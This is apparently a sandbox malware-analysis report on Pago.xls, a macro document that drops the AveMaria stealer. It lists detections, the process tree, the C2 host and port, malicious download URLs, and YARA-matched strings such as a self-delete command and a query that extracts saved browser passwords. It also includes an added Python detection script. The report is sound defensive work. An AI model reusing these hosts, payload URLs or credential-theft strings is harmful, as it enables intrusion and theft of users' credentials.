
Windows Analysis Report
Pago.xls

Overview

General Information

Sample name: Pago.xls
Analysis ID: 1575112
MD5: fcf8455b5da351650ed2e3c7d560d76e
SHA1: e8e8b2be3a8c6bcf4a875671c468eb1dae630111
SHA256: f945161c3ba134c15554ef6dab1300ce6991e341d83bae157117072660533364
Tags: xls, user-abuse_ch

Detection

AveMaria, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Yara detected AveMaria stealer
Yara detected UACMe UAC Bypass tool
C2 URLs / IPs found in malware configuration
Contains functionality to hide user accounts
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
Office process drops PE file
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3168 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • wscript.exe (PID: 3404 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" MD5: 045451FA238A75305CC26AC982472367)
  • WINWORD.EXE (PID: 3460 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • NXRWIG.exe (PID: 3796 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe" MD5: 3871A95491C97785A2CBA0C068A9ED4E)
      • NXRWIG.exe (PID: 3820 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe MD5: 3871A95491C97785A2CBA0C068A9ED4E)
      • NXRWIG.exe (PID: 3828 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe MD5: 3871A95491C97785A2CBA0C068A9ED4E)
  • cleanup
Name: Ave Maria, AveMariaRAT, avemaria
Description: Information stealer which uses AutoIT for wrapping.
Attribution: Anunak
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

Name: UACMe
Description: A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme

Malware configuration (AveMaria): {"C2 url": "dns.stipamana.com", "port": 5220, "Proxy Port": 27904}
Source | Rule | Description | Author | Strings
00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_AveMaria_31d2bce9 | unknown | unknown
  • 0x2d5d90:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
  • 0x2f5cd4:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
  • 0x2d45d8:$a2: SMTP Password
  • 0x2f451c:$a2: SMTP Password
  • 0x2d3818:$a3: select signon_realm, origin_url, username_value, password_value from logins
  • 0x2f375c:$a3: select signon_realm, origin_url, username_value, password_value from logins
  • 0x2d8a60:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x2f8998:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x2d5c98:$a5: for /F "usebackq tokens=*" %%A in ("
  • 0x2f5bdc:$a5: for /F "usebackq tokens=*" %%A in ("
  • 0x2d4008:$a6: \Torch\User Data\Default\Login Data
  • 0x2f3f4c:$a6: \Torch\User Data\Default\Login Data
  • 0x2d8b80:$a7: /n:%temp%\ellocnak.xml
  • 0x2f8ab8:$a7: /n:%temp%\ellocnak.xml
  • 0x2d4b74:$a8: "os_crypt":{"encrypted_key":"
  • 0x2f4ab8:$a8: "os_crypt":{"encrypted_key":"
  • 0x2d8bb0:$a9: Hey I'm Admin
  • 0x2f8ae8:$a9: Hey I'm Admin
  • 0x2d44a0:$a10: \logins.json
  • 0x2f43e4:$a10: \logins.json
  • 0x2d4aec:$a11: Accounts\Account.rec0
00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
(5 entries in total)

Source | Rule | Description | Author | Strings
8.2.NXRWIG.exe.351d400.3.unpack | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
8.2.NXRWIG.exe.351d400.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
8.2.NXRWIG.exe.351d400.3.unpack | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
8.2.NXRWIG.exe.351d400.3.unpack | Windows_Trojan_AveMaria_31d2bce9 | unknown | unknown
  • 0x15a30:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
  • 0x14278:$a2: SMTP Password
  • 0x134b8:$a3: select signon_realm, origin_url, username_value, password_value from logins
  • 0x17ff0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x15938:$a5: for /F "usebackq tokens=*" %%A in ("
  • 0x13ca8:$a6: \Torch\User Data\Default\Login Data
  • 0x18110:$a7: /n:%temp%\ellocnak.xml
  • 0x14814:$a8: "os_crypt":{"encrypted_key":"
  • 0x18140:$a9: Hey I'm Admin
  • 0x14140:$a10: \logins.json
  • 0x1478c:$a11: Accounts\Account.rec0
  • 0x13050:$a12: warzone160
  • 0x156e0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
8.2.NXRWIG.exe.351d400.3.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x138e8:$a1: \Opera Software\Opera Stable\Login Data
  • 0x13c10:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x13558:$a3: \Google\Chrome\User Data\Default\Login Data
(23 entries in total)

                System Summary

Source: File created | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3168, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cfhxdfhgjsxgfhxz[1].vbs
Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 87.121.86.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3404, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
Source: Process started | Author: Jason Lynch | Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 3460, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe" , ProcessId: 3796, ProcessName: NXRWIG.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3168, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , ProcessId: 3404, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3168, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , ProcessId: 3404, ProcessName: wscript.exe
Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 87.121.86.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3168, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: Network Connection | Author: frack113 | Data: DestinationIp: 87.121.86.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3404, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3168, Protocol: tcp, SourceIp: 87.121.86.205, SourceIsIpv6: false, SourcePort: 443
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3168, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , ProcessId: 3404, ProcessName: wscript.exe
Source: Registry Key set | Author: frack113 | Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3168, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3460, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
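Every Sigma hit in the System Summary above comes from one of three Sysmon event types: process creation (the "Process started" entries, EventID 1), file creation (EventID 11) and network connection (EventID 3). The following Python is an added example, not part of the Joe Sandbox report or of the Sigma rules themselves: it re-implements the logic behind the matched rules (Office spawning a script host, Office spawning a binary under a user profile directory, Office dropping a file with an uncommon extension, Office or a script host opening a connection to a non-local address) as one pass over constructed events whose values mirror this report's process tree, plus a self-spawn heuristic for NXRWIG.exe launching a copy of itself, which matches the report's "creates a process in suspended mode" signature but is not one of the Sigma rules listed. The process-name and extension lists are a reduced, assumed subset of what the real Sigma rules carry, and the rule labels are mine, not Sigma rule IDs.

```python
"""Replay of the Sigma-style detections that fired in this report over Sysmon-like events.
Constructed events, not a Sysmon export; lists below are an assumed subset of the real rules."""
import ipaddress

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
DROP_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".exe", ".dll", ".scr")
USER_DIRS = ("\\appdata\\", "\\users\\public\\")


def basename(path):
    """Lower-cased file name of a Windows path ('C:\\...\\EXCEL.EXE' -> 'excel.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_external(ip):
    """True for addresses outside RFC1918/loopback/link-local, the 'non-local' test of the rules."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)


def detect(events):
    """Return (label, evidence) tuples; labels are this example's own names, not Sigma IDs."""
    findings = []
    for e in events:
        img = basename(e["Image"])
        if e["EventID"] == 1:                       # process creation
            parent = basename(e["ParentImage"])
            if parent in OFFICE and img in SCRIPT_HOSTS:
                findings.append(("office_spawns_script_host", e["CommandLine"]))
            if parent in OFFICE and img.endswith(".exe") and \
                    any(d in e["Image"].lower() for d in USER_DIRS):
                findings.append(("office_spawns_binary_in_user_dir", e["Image"]))
            if e["Image"].lower() == e["ParentImage"].lower():
                # heuristic: a binary re-launching its own image is typical of hollowing
                findings.append(("self_spawn_possible_hollowing", e["ProcessId"]))
        elif e["EventID"] == 11:                    # file creation
            if img in OFFICE and e["TargetFilename"].lower().endswith(DROP_EXTS):
                findings.append(("office_drops_uncommon_extension", e["TargetFilename"]))
        elif e["EventID"] == 3:                     # network connection
            if e["Initiated"] and (img in OFFICE or img in SCRIPT_HOSTS) \
                    and is_external(e["DestinationIp"]):
                findings.append(("office_or_script_outbound",
                                 f"{img} -> {e['DestinationIp']}:{e['DestinationPort']}"))
    return findings


# Constructed sample events; paths and PIDs copied from this report's process tree,
# with two benign control events (notepad.exe, chrome.exe) that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 3404, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs"',
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"},
    {"EventID": 1, "ProcessId": 3796, "Image": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe",
     "CommandLine": r'"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe"',
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"},
    {"EventID": 1, "ProcessId": 3820, "Image": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe",
     "CommandLine": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe",
     "ParentImage": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe"},
    {"EventID": 1, "ProcessId": 4000, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 11, "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs"},
    {"EventID": 3, "Image": r"C:\Windows\System32\wscript.exe", "Initiated": True,
     "DestinationIp": "87.121.86.205", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Initiated": True, "DestinationIp": "87.121.86.205", "DestinationPort": 443},
]

if __name__ == "__main__":
    for label, evidence in detect(SAMPLE_EVENTS):
        print(f"{label}: {evidence}")
```

Against the sample events this yields exactly five findings, one per Sigma-style rule plus the self-spawn heuristic, and nothing for the two control events. The real Sigma rules carry far longer child-process and extension lists and also match on OriginalFileName, which the constructed events omit.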

                Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3168, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs
No Suricata rule has matched

                AV Detection

Source: Pago.xls | Avira: detected
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgtt | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/s | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjg | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjw | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhag | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfs | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdg | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfy | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkc | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styh | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/afdtdzrhszdhthsrthsthstgs/server1_protected.exe | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghds | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgd | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwt | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/ | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyj | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdf6 | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdh | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/Sfbuild.doc | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdL | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhy | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjh | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhyd | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhf | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/doc | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjgh | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsj | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdh00 | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfj | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/h | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrg3 | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exZZ | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsd | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/sty | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwY | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgLL | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerw | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagd | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghd | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsb | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/ | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwer | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/st | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhys | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknd9 | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgj | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysd | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrF | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjgh | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfj | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfx | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhg | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhyds | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/do | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgx | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/eii | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjh | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsf | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdsk | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/ww | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknN | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjf | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhy | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskf | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgw | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styha | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwe | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknds$ | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgt | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqk | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjg | Avira URL Cloud: Label: malware
Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjq | Avira URL Cloud: Label: malware
